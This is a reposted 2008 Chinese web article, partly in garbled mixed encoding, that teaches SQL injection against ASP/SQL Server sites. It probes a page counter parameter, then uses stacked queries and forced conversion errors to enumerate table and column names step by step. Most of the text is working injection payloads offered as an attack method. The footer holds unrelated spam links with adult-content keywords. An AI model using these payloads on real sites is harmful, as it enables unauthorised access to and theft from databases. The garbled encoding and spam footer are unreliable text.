SQL腳本注入的不常見方法概括

http://www.yibo1263.com　2008/7/27 7:26:38 　來源:本站　編輯:葉子

　　大家在是否碰到過這樣的站點：

　　全站文章系統(tǒng)采用FSO靜態(tài)生成的HTML文件來顯示。這樣做的好處一來可以減輕服務器負擔，提高訪問速度。二來也阻止了SQL注入式的攻擊。。

　　我來說說他們的文章系統(tǒng)原理：全部文章均在數(shù)據(jù)庫存有一個副本。另處根據(jù)模板生成一個HTML頁面。

　　攻擊方法：

　　查看源文件/看里面是否有通過JS來調(diào)用的頁面。

　　如調(diào)用來更新文章的瀏覽次數(shù)。

　　我們就可以這樣來試一下可否注入：

　　http://服務器域名/count.asp?id=1552’

　　看一下是否出錯。如出錯說明有注入漏洞。然后正常攻擊。

　　在本機建立一下post.htm的文件和log.txt的文本文件(用來記錄用，這是一個好習慣)

　　post.htm內(nèi)容：主要是方便輸入。

　　對于SQLSERVER的服務器可以這樣判斷：在1552后加一分號，如正常有可能是SQLSERVER

　　對于這類數(shù)據(jù)庫可以先建一個表id=1552;create table aaa(aaa char(20));--

　　然后插入一條記錄：id=1552;insert into aaa values(’test’);--

　　再之后枚舉出他的數(shù)據(jù)表名：

　　id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--

　　這是將第一個表名更新到aaa的字段處。

　　id=1552 and exists(select * from aaa where aaa>5)就會報錯，多數(shù)情況會將表名直接讀出：看：

　　Microsoft OLE DB Provider for SQL Server 錯誤 ’80040e07’

　　將 varchar 值 ’vote’ 轉(zhuǎn)換為數(shù)據(jù)類型為 int 的列時發(fā)生語法錯誤。

　　/search.asp，行21

　　其中vote就是表名：

　　也可以先猜出一個表名，再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那個表的一條記錄中去。通過網(wǎng)頁顯示。

　　讀出第一個表，第二個表可以這樣讀出來(在條件后加上 and name<>’剛才得到的表名’)。

　　id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--

　　然后id=1552 and exists(select * from aaa where aaa>5)

　　讀出第二個表，^^^^^^一個個的讀出，直到?jīng)]有為止。

　　讀字段是這樣：

　　id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--

　　然后id=1552 and exists(select * from aaa where aaa>5)出錯，得到字段名

　　id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--

　　然后id=1552 and exists(select * from aaa where aaa>5)出錯，得到字段名

　　……類推

【收藏】【打印】【進入論壇】

相關(guān)文章：

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费